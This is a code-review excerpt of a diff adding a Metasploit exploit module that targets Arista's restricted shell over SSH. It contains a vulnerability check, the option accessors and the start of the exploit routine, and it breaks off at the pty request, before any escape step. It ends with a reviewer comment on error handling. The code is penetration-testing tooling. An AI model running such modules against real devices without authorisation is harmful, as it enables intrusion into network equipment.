modules/exploits/unix/ssh/arista_tacplus_shell.rb

```diff
@@ -0,0 +1,196 @@
+    opts = {
+      :auth_methods    => ['password', 'keyboard-interactive'],
+      :port            => rport,
+      :use_agent       => false,
+      :config          => false,
+      :password        => password,
+      :proxy           => factory,
+      :non_interactive => true,
+      :verify_host_key => :never
+    }
+
+    begin
+      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
+        Net::SSH.start(rhost, username, opts)
+      end
+    rescue Rex::ConnectionError
+      return Exploit::CheckCode::Safe
+    rescue Net::SSH::Disconnect, ::EOFError
+      return Exploit::CheckCode::Safe
+    rescue ::Timeout::Error
+      return Exploit::CheckCode::Safe
+    rescue Net::SSH::AuthenticationFailed
+      return Exploit::CheckCode::Safe
+    rescue Net::SSH::Exception
+      return Exploit::CheckCode::Safe
+    end
+
+    return Exploit::CheckCode::Vulnerable
+
+  end
+
+  def rhost
+    datastore['RHOST']
+  end
+
+  def rport
+    datastore['RPORT']
+  end
+
+  def lport
+    datastore['LPORT']
+  end
+
+  def lhost
+    datastore['LHOST']
+  end
+
+  def username
+    datastore['USERNAME']
+  end
+
+  def password
+    datastore['PASSWORD']
+  end
+
+  def exploit
+    factory = ssh_socket_factory
+
+    opts = {
+      :auth_methods    => ['password', 'keyboard-interactive'],
+      :port            => rport,
+      :use_agent       => false,
+      :config          => false,
+      :password        => password,
+      :proxy           => factory,
+      :non_interactive => true,
+      :verify_host_key => :never
+    }
+
+    opts.merge!(:verbose => :debug) if datastore['SSH_DEBUG']
+
+    print_status("#{rhost}:#{rport} - Attempt to login to the Arista's restricted shell...")
+
+    begin
+      ssh = nil
+      ::Timeout.timeout(datastore['SSH_TIMEOUT']) do
+        ssh = Net::SSH.start(rhost, username, opts)
+      end
+    rescue Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{rhost}:#{rport} SSH - Connection error or address in use")
+    rescue Net::SSH::Disconnect, ::EOFError
+      fail_with(Failure::Disconnected, "#{rhost}:#{rport} SSH - Disconnected during negotiation")
+    rescue ::Timeout::Error
+      fail_with(Failure::TimeoutExpired, "#{rhost}:#{rport} SSH - Timed out during negotiation")
+    rescue Net::SSH::AuthenticationFailed
+      fail_with(Failure::NoAccess, "#{rhost}:#{rport} SSH - Failed authentication")
+    rescue Net::SSH::Exception => e
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} SSH Error: #{e.class} : #{e.message}")
+
+    end
+
+    fail_with(Failure::Unknown, "#{rhost}:#{rport} SSH session couldn't be established") unless ssh
+    begin
+      if ssh
+        payload_executed = false
+        print_good("SSH connection established.")
+
+        ssh.open_channel do |channel, data|
+          print_status("Requesting pty rbash")
+
+          channel.request_pty do |ch, success|
+            raise ::RuntimeError, "Could not request pty!" unless success
```

Comment:
This should be a `fail_with`, as in other places in the module.

Reply:
Resolved!